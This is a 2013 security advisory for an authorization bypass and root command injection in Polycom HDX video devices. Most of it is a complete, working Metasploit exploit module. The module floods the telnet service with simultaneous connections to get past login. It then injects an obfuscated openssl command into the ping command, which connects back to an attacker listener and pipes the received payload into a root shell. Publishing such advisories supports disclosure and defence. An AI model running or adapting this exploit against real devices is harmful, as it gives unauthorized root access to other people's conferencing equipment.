========================================================================
= Polycom HDX Telnet Authorization Bypass
=
= Vendor Website:
= www.polycom.com
=
= Affected Version:
= Polycom HDX devices:
= All releases prior to and including Commercial 3.0.5
=
= Public disclosure on January 18, 2013
=
========================================================================
== Overview ==
The Polycom HDX is a series of telecommunication and video devices. The
telnet component of Polycom HDX video endpoint devices is vulnerable to
an authorization bypass when multiple simultaneous connections are
repeatedly made to the service, allowing remote network attackers to
gain full access to a Polycom command prompt without authentication.
Versions prior to 3.0.4 also contain OS command injection in the ping
command which can be used to escape the telnet prompt and execute
arbitrary commands as root.
== Solution ==
Until a software solution is released, Polycom recommends administrators
disable telnet on their HDX unit.
== Credit ==
Discovered and advised to Polycom Inc., 2012 by Paul Haas of
Security-Assessment.com.
== About Security-Assessment.com ==
Security-Assessment.com is a leading team of Information Security
consultants specializing in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognized companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Web: www.security-assessment.com
Email: info@security-assessment.com
== Exploitation ==
The following Metasploit module can be used to reproduce the issue:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Polycom Command Shell Authorization Bypass',
'Alias' => 'psh_auth_bypass',
'Author' => [ 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>' ],
'DisclosureDate' => 'Jan 18 2013',
'Description' => %q{
The login component of the Polycom Command Shell on Polycom HDX
Video End Points running software versions 3.0.5 and earlier
is vulnerable to an authorization bypass when simultaneous
connections are made to the service, allowing remote network
attackers to gain access to a sandboxed telnet prompt without
authentication. Versions prior to 3.0.4 contain OS command
injection in the ping command which can be used to execute
arbitrary commands as root.
},
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
[ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ]
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Space' => 8000,
'DisableNops' => true,
'Compat' => { 'PayloadType' => 'cmd',},
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(23),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
],self.class)
register_advanced_options(
[
OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
], self.class)
end
def check
connect
sock.put(Rex::Text.rand_text_alpha(rand(5)+1) + "\n")
::IO.select(nil, nil, nil, 1)
res = sock.get
disconnect
if !(res and res.length > 0)
return Exploit::CheckCode::Safe
end
if (res =~ /Welcome to ViewStation/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
# Keep track of results (successful connections)
results = []
# Random string for password
password = Rex::Text.rand_text_alpha(rand(5)+1)
# Threaded login checker
max_threads = datastore['THREADS']
cur_threads = []
# Try up to 100 times just to be sure
queue = [*(1 .. datastore['MAX_CONNECTIONS'])]
print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ")
while(queue.length > 0)
while(cur_threads.length < max_threads)
# We can stop if we get a valid login
break if results.length > 0
# keep track of how many attempts we've made
item = queue.shift
# We can stop if we reach max tries
break if not item
t = Thread.new(item) do |count|
sock = connect
sock.put(password + "\n")
res = sock.get
while res.length > 0
break if results.length > 0
# Post-login Polycom banner means success
if (res =~ /Polycom/)
results << sock
break
# bind error indicates bypass is working
elsif (res =~ /bind/)
sock.put(password + "\n")
#Login error means we need to disconnect
elsif (res =~ /failed/)
break
#To many connections means we need to disconnect
elsif (res =~ /Error/)
break
end
res = sock.get
end
end
cur_threads << t
end
# We can stop if we get a valid login
break if results.length > 0
# Add to a list of dead threads if we're finished
cur_threads.each_index do |ti|
t = cur_threads[ti]
if not t.alive?
cur_threads[ti] = nil
end
end
# Remove any dead threads from the set
cur_threads.delete(nil)
::IO.select(nil, nil, nil, 0.25)
end
# Clean up any remaining threads
cur_threads.each {|sock| sock.kill }
if results.length > 0
print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
do_payload(results[0])
else
print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
end
end
def do_payload(sock)
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
# Start a listener
start_listener(true)
# Figure out the port we picked
cbport = self.service.getsockname[2]
# Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
sock.put(cmd)
# Give time for our command to be queued and executed
1.upto(5) do
::IO.select(nil, nil, nil, 1)
break if session_created?
end
end
def stage_final_payload(cli)
print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
cli.put(payload.encoded + "\n")
end
def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == "local"
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => ssl,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
self.service.on_client_connect_proc = Proc.new { |client|
stage_final_payload(client)
}
# Start the listening service
self.service.start
end
# Shut down any running services
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.kind_of?(Rex::Service)
if self.service.kind_of?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::Exception
end
end
end
# Accessor for our TCP payload stager
attr_accessor :service
end